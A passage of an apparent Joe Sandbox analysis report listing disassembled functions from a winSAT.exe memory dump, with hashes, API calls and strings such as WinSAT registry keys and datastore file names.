                                                                                                                                                                                              • Instruction ID: fa7d0e3768467c3f19d15c0574a953fd5fd10e38a5648bf7bdbc9415c0c75d45
                                                                                                                                                                                              • Opcode Fuzzy Hash: d16b25315d6b87577e5c7b26a4137971e0f7868615d898ce74960aaa2d60d9e7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 8D71A372608B8286EB10EF21E4403ADB7A0FB85B54FA09235DB4D53BA5DF7CE465CB50
                                                                                                                                                                                              Function 00007FF780FAC348 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 97COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: s is null$slen is equal to npos
                                                                                                                                                                                              • API String ID: 3934552184-3164880081
                                                                                                                                                                                              • Opcode ID: 82b3919f21eb8aded00b125591872073d8a2c50b47a994f32de95872d43d0fb4
                                                                                                                                                                                              • Instruction ID: 2efdc0633ecc5af5c09d97dc1dd8537222aa5380358c6323713332d0f89d5b0a
                                                                                                                                                                                              • Opcode Fuzzy Hash: 82b3919f21eb8aded00b125591872073d8a2c50b47a994f32de95872d43d0fb4
                                                                                                                                                                                              • Instruction Fuzzy Hash: DE319162A0CA4280EE10F726E8502B9E360BF40BE4FF49232DA5D077D6DF6CE416C360
                                                                                                                                                                                              Function 00007FF780FCC928 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrowstd::bad_exception::bad_exception$memcpy
                                                                                                                                                                                              • String ID: s is null$slen is equal to npos
                                                                                                                                                                                              • API String ID: 3934552184-3164880081
                                                                                                                                                                                              • Opcode ID: 4e5016746a919f54f27355177a16e6a4b637a04d9d80be9043f319258e82eded
                                                                                                                                                                                              • Instruction ID: 9e82b238a46b2d72393084d5df07073989d2d266a48706c759e2767d4defb4b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e5016746a919f54f27355177a16e6a4b637a04d9d80be9043f319258e82eded
                                                                                                                                                                                              • Instruction Fuzzy Hash: C5318262A0DA4680EA14F725E4512B9E361BF40BE0FF48631DA5D47BD5DF6CE445C360
                                                                                                                                                                                              Function 00007FF780FB0D28 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$CloseOpenQueryValue
                                                                                                                                                                                              • String ID: MaxWinSATFiles
                                                                                                                                                                                              • API String ID: 772312138-2433871838
                                                                                                                                                                                              • Opcode ID: f5233d36f380a734c022fe35bafe7137f3d4e448de3ff05596bce2b57fc778b3
                                                                                                                                                                                              • Instruction ID: 08678abfae6417429799de4dc46d1bcc8f3183d168c44461c3f7a0776e73fd76
                                                                                                                                                                                              • Opcode Fuzzy Hash: f5233d36f380a734c022fe35bafe7137f3d4e448de3ff05596bce2b57fc778b3
                                                                                                                                                                                              • Instruction Fuzzy Hash: 55417336B04A419AEB10EF60D8905ECB7B0FF89768FA55271DA5E43794DF38E845C710
                                                                                                                                                                                              Function 00007FF780FE01B4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 81librarywindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$Wininet.dll$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-1005095589
                                                                                                                                                                                              • Opcode ID: 2cf73351e48347c452b40719ab9ee8b50d253507448f3dfabd3c0071896441c7
                                                                                                                                                                                              • Instruction ID: ec2041289ed412bb2c4bf42f0cc426ff4ed682b1af15b400000478b04de594cc
                                                                                                                                                                                              • Opcode Fuzzy Hash: 2cf73351e48347c452b40719ab9ee8b50d253507448f3dfabd3c0071896441c7
                                                                                                                                                                                              • Instruction Fuzzy Hash: 44317C36A0CB4186E7509F11E4483B9B6A1FF48B88FA88134DB8D4B788DF3CE585CB54
                                                                                                                                                                                              Function 00007FF780FA96E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 78librarywindowCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$FormatFreeLoadMessageStringType
                                                                                                                                                                                              • String ID: H$Wininet.dll$netmsg.dll
                                                                                                                                                                                              • API String ID: 270474373-1005095589
                                                                                                                                                                                              • Opcode ID: 26600ed753b68a34953658dd516c778d6644a0e54bbf0918482d0f5805d8a92c
                                                                                                                                                                                              • Instruction ID: e3c1dedc3a9168bd4b6ef08cc69af1f88ad2329dc547f81559ff7edd2afc4305
                                                                                                                                                                                              • Opcode Fuzzy Hash: 26600ed753b68a34953658dd516c778d6644a0e54bbf0918482d0f5805d8a92c
                                                                                                                                                                                              • Instruction Fuzzy Hash: CF31C032A1D78186E7509F16E4043B9FB90FB49B98FA88134CA8D47B89CF7CE155CB20
                                                                                                                                                                                              Function 00007FF780F9DDF4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 60registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Close$CreateOpen
                                                                                                                                                                                              • String ID: SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT$WinSAT regisrty key missing - create the winsat key$base\winsat\exe\main.cpp
                                                                                                                                                                                              • API String ID: 1299239824-193752149
                                                                                                                                                                                              • Opcode ID: a9616c77da2f32d26936442f92825e436a815f897e6bbc82c8b6411258b67724
                                                                                                                                                                                              • Instruction ID: 92ac59037df8b752a172f659db16975c8a079e57b6eac406bbe5b00b030bc77b
                                                                                                                                                                                              • Opcode Fuzzy Hash: a9616c77da2f32d26936442f92825e436a815f897e6bbc82c8b6411258b67724
                                                                                                                                                                                              • Instruction Fuzzy Hash: E3217A32A18B4283EB50AF24F8407B9E6A5FB997A4FB48230DA4D07794DF7CE405CB10
                                                                                                                                                                                              Function 00007FF780FDB3C4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45memoryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Heap$Process$AllocErrorFirmwareFreeLastSystemTable
                                                                                                                                                                                              • String ID: BMSR
                                                                                                                                                                                              • API String ID: 3794700658-2095607670
                                                                                                                                                                                              • Opcode ID: b8110a5a3b8882f7f2eabdac88b06e4c563bda2c8467eeff40563307e562eb17
                                                                                                                                                                                              • Instruction ID: 97224f9931b2970f4734079846a665775eea8102037ccd5a22e27a60cf5354e6
                                                                                                                                                                                              • Opcode Fuzzy Hash: b8110a5a3b8882f7f2eabdac88b06e4c563bda2c8467eeff40563307e562eb17
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52112836A09B82C6E7549F12B844279FBA0FB8EB91FA4D174CA4E43358DF38E055CB10
                                                                                                                                                                                              Function 00007FF780FB0E84 Relevance: 12.1, APIs: 5, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: GetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0872
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: RegCloseKey.ADVAPI32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE0891
                                                                                                                                                                                                • Part of subcall function 00007FF780FE0840: SetLastError.KERNEL32(?,?,?,00007FF780FF0D7D), ref: 00007FF780FE08A4
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FB0F2E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast$Close
                                                                                                                                                                                              • String ID: $SkipFileDelete$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2117561858-1378043259
                                                                                                                                                                                              • Opcode ID: d3326061a4eefa1869982633472d77142edb3e95a824fc51a1e6ce28615a36aa
                                                                                                                                                                                              • Instruction ID: 6361d5d496a324b6bf5bf614612448f83fd05b44da60440cc8eacc05d15ebf49
                                                                                                                                                                                              • Opcode Fuzzy Hash: d3326061a4eefa1869982633472d77142edb3e95a824fc51a1e6ce28615a36aa
                                                                                                                                                                                              • Instruction Fuzzy Hash: E6517222B1C68296EB20BB25E8501FDA760FF85794FE09135EA4E477E5DE3CE944CB10
                                                                                                                                                                                              Function 00007FF780FC53F4 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 135COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ErrorLast__uncaught_exception$ExceptionThrow
                                                                                                                                                                                              • String ID: </metrics>$</winspr>$<IsFormal/>$<metrics>$<winspr>$xmlns="http://www.microsoft.com/winsat.xsd"
                                                                                                                                                                                              • API String ID: 2864429452-1451767560
                                                                                                                                                                                              • Opcode ID: 548d7fd57bfcb86c23ae2b33cfd82f4df3a9468c1205110824524e2e7cf61f22
                                                                                                                                                                                              • Instruction ID: 841fa6b01437056d92d3c503c39802167586184689b17ec805396651694420af
                                                                                                                                                                                              • Opcode Fuzzy Hash: 548d7fd57bfcb86c23ae2b33cfd82f4df3a9468c1205110824524e2e7cf61f22
                                                                                                                                                                                              • Instruction Fuzzy Hash: BA519E21A0C64240EE24BB2699513B9A351BF88BB4FE48731D97D073E6DF6CF145C620
                                                                                                                                                                                              Function 00007FF780FAFD68 Relevance: 12.1, APIs: 2, Strings: 6, Instructions: 130COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • _CxxThrowException.MSVCRT ref: 00007FF780FAFF56
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: GetModuleHandleW.KERNEL32(?,?,00000001,00007FF780F94E15), ref: 00007FF780FDC71A
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: FindResourceW.KERNEL32 ref: 00007FF780FDC79D
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: SizeofResource.KERNEL32 ref: 00007FF780FDC7BE
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LoadResource.KERNEL32 ref: 00007FF780FDC7D8
                                                                                                                                                                                                • Part of subcall function 00007FF780FDC700: LockResource.KERNEL32 ref: 00007FF780FDC7F0
                                                                                                                                                                                                • Part of subcall function 00007FF780FA9C0C: __uncaught_exception.MSVCRT ref: 00007FF780FA9DE6
                                                                                                                                                                                                • Part of subcall function 00007FF780FA2944: __uncaught_exception.MSVCRT ref: 00007FF780FA2A2B
                                                                                                                                                                                              • SetLastError.KERNEL32 ref: 00007FF780FAFE0F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Resource$__uncaught_exception$ErrorExceptionFindHandleLastLoadLockModuleSizeofThrow
                                                                                                                                                                                              • String ID: %s\%04d-%02d-%02d %02d.%02d.%06.3f %sAssessment (%s)%s$.WinSAT.xml$Initial$Prepop$Recent$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2870604065-1136351508
                                                                                                                                                                                              • Opcode ID: 581f6557769874b9caf71b36b16fed06e0a8285577833d249764be9238837a21
                                                                                                                                                                                              • Instruction ID: 42eac494af68a7056d8496f37e958ec4714138a71b1b4e4d5523142bc202e26c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 581f6557769874b9caf71b36b16fed06e0a8285577833d249764be9238837a21
                                                                                                                                                                                              • Instruction Fuzzy Hash: 1D51C631A0C74283D724EB16E8901A9E760FB85790FA0A135EA4D477E5DF7CF955C720
                                                                                                                                                                                              Function 00007FF780FAB568 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 194COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is > string length
                                                                                                                                                                                              • API String ID: 1420024681-1677109599
                                                                                                                                                                                              • Opcode ID: ffd79ee95c958e5184ba19f1e7012cde39c1359b6950366d14ea321e7ea7ebff
                                                                                                                                                                                              • Instruction ID: 36ea74d39d9c9f1d5437aae435e18fee5e022a13eb6fb1eaa3c0e3f1b77767a3
                                                                                                                                                                                              • Opcode Fuzzy Hash: ffd79ee95c958e5184ba19f1e7012cde39c1359b6950366d14ea321e7ea7ebff
                                                                                                                                                                                              • Instruction Fuzzy Hash: E071BF26B0D64281FB10AB62D4102FDA7A1BB85B8CFA49131CE0D177D6DE7CF46AC360
                                                                                                                                                                                              Function 00007FF780FB06B8 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 189COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: EnabledErrorEventLast$CountCurrentProcessTick_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: $ERROR: %#08X GetAllWinSATAssessmentFileNames failed.$ERROR: %#08X GetWinSATDataStoreDir failed.$base\winsat\exe\datastore.cpp
                                                                                                                                                                                              • API String ID: 2434953431-2477654378
                                                                                                                                                                                              • Opcode ID: b0a2a4882fa2028f924a65576c508de44b6216415d3e2cd81f056cb6c5f1fbe6
                                                                                                                                                                                              • Instruction ID: 13f97c518d6b8eb287348954a771b841696adddc2653447bf4b2fc46707cf7f5
                                                                                                                                                                                              • Opcode Fuzzy Hash: b0a2a4882fa2028f924a65576c508de44b6216415d3e2cd81f056cb6c5f1fbe6
                                                                                                                                                                                              • Instruction Fuzzy Hash: F7714121B1DA4292EA50FB11E8506B9E350FFC5794FE0A031EA4E877E6DE2CF905CB50
                                                                                                                                                                                              Function 00007FF780FAF2EC Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 160COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: StringType$ExceptionThrowstd::bad_exception::bad_exception
                                                                                                                                                                                              • String ID: pos is >= string length
                                                                                                                                                                                              • API String ID: 1420024681-2903460325
                                                                                                                                                                                              • Opcode ID: d4800845e33a63bc32fc1e668ffefbfff9f80fe0570128d63de91f72c096ab2d
                                                                                                                                                                                              • Instruction ID: e7a533799b14b0aeb900d2f2fca0159bd5e2704f7207d5459c81fc450d2eef47
                                                                                                                                                                                              • Opcode Fuzzy Hash: d4800845e33a63bc32fc1e668ffefbfff9f80fe0570128d63de91f72c096ab2d
                                                                                                                                                                                              • Instruction Fuzzy Hash: B1518416B0D74296FB20ABA2D4002BEA761BB49B9CFA49131CE0D1B7D4DE7CF45AC350
                                                                                                                                                                                              Function 00007FF780F9566C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000013.00000002.2219610158.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000013.00000002.2219571819.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2219949880.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220162820.00007FF78110D000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000013.00000002.2220904032.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_19_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: HandleModule$CriticalInitializeSectionmemset
                                                                                                                                                                                              • String ID: d
                                                                                                                                                                                              • API String ID: 2718962744-2564639436
                                                                                                                                                                                              • Opcode ID: a5870af077abcccb94e2238b01f323aafd47aa4e0208380a18c8d3ec853ec688
                                                                                                                                                                                              • Instruction ID: 09248bd66211b187fe552beaeb27e3e90798b5be24a75d7efeed1d0038981269
                                                                                                                                                                                              • Opcode Fuzzy Hash: a5870af077abcccb94e2238b01f323aafd47aa4e0208380a18c8d3ec853ec688
                                                                                                                                                                                              • Instruction Fuzzy Hash: 34812532A09B80CAE700DF74E84429C77B5FB04B58F548239CA5D2B7AADF389069C764
                                                                                                                                                                                              Function 00007FF7810A45A4 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ___lc_handle_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A461F
                                                                                                                                                                                              • ___lc_codepage_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4628
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4689
                                                                                                                                                                                              • _errno.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A46A7
                                                                                                                                                                                              • __pctype_func.MSVCRT(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A46BE
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A470A
                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(?,?,?,00000000,00000000,00007FF780F92486), ref: 00007FF7810A4742
                                                                                                                                                                                              Memory Dump Source
